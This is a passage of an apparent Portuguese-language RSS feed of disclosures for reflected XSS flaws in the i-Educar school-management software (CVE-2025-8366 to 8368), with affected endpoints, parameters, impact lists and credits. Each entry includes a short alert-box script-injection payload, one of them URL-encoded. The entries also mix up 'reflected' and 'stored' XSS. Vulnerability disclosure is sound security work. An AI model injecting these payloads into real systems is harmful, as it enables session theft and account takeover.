&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8366/image.png&amp;#34;
	width=&amp;#34;863&amp;#34;
	height=&amp;#34;1056&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8366/image_hu_6199b9aaaa300864.png 480w, /p/cve-2025-8366/image_hu_e3f7025ac01bf0a0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;81&amp;#34;
		data-flex-basis=&amp;#34;196px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8366.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8366.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8367</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8367/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8367/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8367-cross-site-scripting-xss-refletido-no-endpoint-funcionario_vinculo_lstphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8367: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8367&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8367&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8367-cross-site-scripting-xss-refletido-no-endpoint-funcionario_vinculo_lstphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8367: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8367&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8367&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;funcionario_vinculo_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8367/image.png&amp;#34;
	width=&amp;#34;847&amp;#34;
	height=&amp;#34;702&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8367/image_hu_facf55028aaff81d.png 480w, /p/cve-2025-8367/image_hu_e1b6305ab119a43a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;120&amp;#34;
		data-flex-basis=&amp;#34;289px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8367.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8367.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8368</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8368/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8368/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8368-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-pesquisa_pessoa_lstphp&amp;#34;&amp;gt;CVE-2025-8368: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8368&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8368&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8368-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-pesquisa_pessoa_lstphp&amp;#34;&amp;gt;CVE-2025-8368: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8368&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8368&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Cscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Ealert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;28&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;PoC&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Fscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8368/image.png&amp;#34;
	width=&amp;#34;1527&amp;#34;
	height=&amp;#34;499&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8368/image_hu_ed5558ad0fc1df7d.png 480w, /p/cve-2025-8368/image_hu_9f69f1446734701d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;306&amp;#34;
		data-flex-basis=&amp;#34;734px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esse payload pode ser injetado em qualquer um dos dois parâmetros. Exemplos de URLs de ataque:&amp;lt;/p&amp;gt;
&amp;lt;h4 id=&amp;#34;parâmetro-campo_busca&amp;#34;&amp;gt;Parâmetro &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt;
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
